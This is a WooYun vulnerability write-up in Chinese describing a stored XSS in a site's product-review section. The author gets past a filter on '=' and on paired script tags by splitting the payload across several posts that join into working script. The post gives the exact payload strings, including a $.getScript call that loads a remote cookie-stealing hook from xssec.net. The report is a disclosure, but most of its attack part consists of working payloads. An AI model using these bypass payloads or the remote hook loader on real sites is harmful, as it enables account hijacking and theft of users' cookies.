WooYun.org

在产品试用的发表评论以及心得处！
过滤规则非常不严谨 连双引号 >括号都没有过滤！
但是也很让人蛋疼 过滤了 =号 script！
这个时候要想加载hook不可能了 甚至连弹窗的都不可能！
因为不能<script>alert(/Jin/)</script>
或者<img src=x onerror=alert(1)>
因为script 以及等号都不用用。。。
这时候 我等技术差的就陷入困境。。。
我应该怎么办？是妥协 插入<style>这种不要等于号的 用css来XSS？
还是去寻找奇淫技巧？No 我们不能妥协 它强悍 我们就要更强悍
在之前摸清楚的规律规则下 就去提问二哥
ps:等于号是不能输入的 即使是单纯的等于号。。。
这时候二哥给了我思路 过滤=号 你测试了等号 那script测试没？
我去一语惊醒梦中人。。。 赶紧去测试。。。
后来经过测试 原来不是直接过滤script 而是过滤一对 <script></script>
这时候猥琐的我们就来了！
发两篇心得 然后拼凑起来 即可！
首先先发一篇标题为：”>/*</script>
再发一篇标题为："><script>alert(/Jin/)/*
拼凑起来 <script>alert(/Jin/)/*xxxxxx*/</script>
加载Hook:Xsser玩XSS大多都喜欢拿到cookie(虽然我对cookie不是很感冒)为了剧情需要 我就记载个吧！虽然过滤了等号 不能常规的来加载hook 比如<script src=http://xssec.net/xxx> 但是全站都用了jquery 于是我便这样加载了 hook 发三次心得 每次从代码的最后开始发 因为最新的内容是在上面的 本身我们要插入 A B C 但是我们插入hook的时候 就要先从C开始插 1. C 2.B 3.A 最新内容是再最上面的 最后插入三次后的结果便成了 A B C ！如果从代码的开始插的话 就是 C B A 了！
我先第一次 插入">*/</script>
第二次插入 ">*/$.getScript('//xssec.net/xxxx')/* ps:为了节省字符 加载hook 我只用了// 代表使用当前协议去加载
第三次插入"><script>/*
ps:每次只能插入20个中文字符也就是40个字节！
经过排序 3 --》 1 2 --》2 1--》3 所以经过拼凑：
"><script>/*">*/$.getScript('//xssec.net/xxxx')/*">*/</script>
中间的多行注释 注释掉了那些干扰我们的万恶代码！
成功加载hook！
OK 躲避过滤规则 成功绕过！ 附上高清无码图一张 请笑纳！
这次特意到咖啡厅这种安静的环境下来喝杯咖啡 一边挖洞的！
对于我这种屌丝行为 弱弱的问一句 我98块一杯的蓝山能给个SSD报销一下么。。。。